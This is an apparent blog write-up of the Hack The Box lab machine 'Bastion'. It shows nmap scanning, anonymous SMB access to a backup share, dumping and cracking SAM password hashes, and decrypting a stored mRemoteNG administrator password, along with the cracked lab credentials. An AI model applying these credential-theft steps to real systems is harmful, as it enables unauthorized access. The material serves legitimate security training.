HTB: Bastion

Details

This machine is Bastion from Hack The Box

Recon

Started by looking for services

root@kali:~# nmap -sV -p- -T4 10.10.10.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-13 21:48 BST
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 46.15% done; ETC: 21:49 (0:00:20 remaining)
Nmap scan report for 10.10.10.134
Host is up (0.035s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.73 seconds

User

I started on SMB

root@kali:~# smbclient -L 10.10.10.134
Enter WORKGROUP\root's password: 

Just hit enter

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    Backups         Disk
    C$              Disk      Default share
    IPC$            IPC       Remote IPC

So I mounted the backups share

root@kali:~# mount -v //10.10.10.134/Backups /tmp/mounted
Password for root@//10.10.10.134/Backups:  

I just hit enter

root@kali:/tmp/mounted# ls -la
total 29
drwxr-xr-x  2 root root  4096 Apr 16 11:02 .
drwxrwxrwt 17 root root 20480 Jun 13 21:52 ..
-r-xr-xr-x  1 root root   116 Apr 16 11:10 note.txt
-rwxr-xr-x  1 root root     0 Feb 22 12:43 SDT65CB.tmp
drwxr-xr-x  2 root root     0 Feb 22 12:44 WindowsImageBackup

I’ll take a look at this

root@kali:/tmp/mounted# cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Whats in the backup folder

root@kali:/tmp/mounted# cd WindowsImageBackup/
root@kali:/tmp/mounted/WindowsImageBackup# ls -la
total 4
drwxr-xr-x 2 root root    0 Feb 22 12:44 .
drwxr-xr-x 2 root root 4096 Jun 13 21:56 ..
drwxr-xr-x 2 root root    0 Feb 22 12:45 L4mpje-PC

root@kali:/tmp/mounted/WindowsImageBackup/L4mpje-PC# ls -la
total 8
drwxr-xr-x 2 root root 4096 Feb 22 12:45  .
drwxr-xr-x 2 root root    0 Feb 22 12:44  ..
drwxr-xr-x 2 root root    0 Feb 22 12:45 'Backup 2019-02-22 124351'
drwxr-xr-x 2 root root    0 Feb 22 12:45  Catalog
-rwxr-xr-x 1 root root   16 Feb 22 12:44  MediaId
drwxr-xr-x 2 root root    0 Feb 22 12:45  SPPMetadataCache

root@kali:/tmp/mounted/WindowsImageBackup/L4mpje-PC# cd 'Backup 2019-02-22 124351'/

This directory had 2 vhd files, I mounted the larger one

root@kali:/tmp/mounted/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351

And looked inside

root@kali:/tmp/vh1# ls -la
total 2096765
drwxrwxrwx  1 root root      12288 Feb 22 12:39  .
drwxrwxrwt 21 root root      20480 Jun 13 22:06  ..
drwxrwxrwx  1 root root          0 Feb 22 12:39 '$Recycle.Bin'
-rwxrwxrwx  1 root root         24 Jun 10  2009  autoexec.bat
-rwxrwxrwx  1 root root         10 Jun 10  2009  config.sys
lrwxrwxrwx  2 root root         14 Jul 14  2009 'Documents and Settings' -> /sysroot/Users
-rwxrwxrwx  1 root root 2147016704 Feb 22 12:38  pagefile.sys
drwxrwxrwx  1 root root          0 Jul 14  2009  PerfLogs
drwxrwxrwx  1 root root       4096 Jul 14  2009  ProgramData
drwxrwxrwx  1 root root       4096 Apr 12  2011 'Program Files'
drwxrwxrwx  1 root root          0 Feb 22 12:39  Recovery
drwxrwxrwx  1 root root       4096 Feb 22 12:43 'System Volume Information'
drwxrwxrwx  1 root root       4096 Feb 22 12:39  Users
drwxrwxrwx  1 root root      16384 Feb 22 12:40  Windows

So I went to check the SAM file

root@kali:/tmp/vh1/Windows/System32/config# samdump2 ./SYSTEM ./SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

I put the L4mpje one into a file called crack.txt and set john on it

root@kali:~# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje     (L4mpje)
1g 0:00:00:00 DONE (2019-06-13 22:31) 1.123g/s 10556Kp/s 10556Kc/s 10556KC/s buresres..burdy1
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

The creds are

L4mpje:bureaulampje

So I tested them on ssh

root@kali:~# ssh [email protected]
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje> 

Get my flag

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
[REDACTED]

System

A file called mRemoteNG was installed, which I found contained a config file with credentials

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
[SNIP]
Userna
me="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
[SNIP]

I found a tool to decrypt the password https://github.com/kmahyyg/mremoteng-decrypt/blob/master/mremoteng_decrypt.py

root@kali:~# python3 mremoteng_decrypt.py  -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2

I used this on ssh

root@kali:~# ssh [email protected]
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>   

So I grabbed my flag

administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.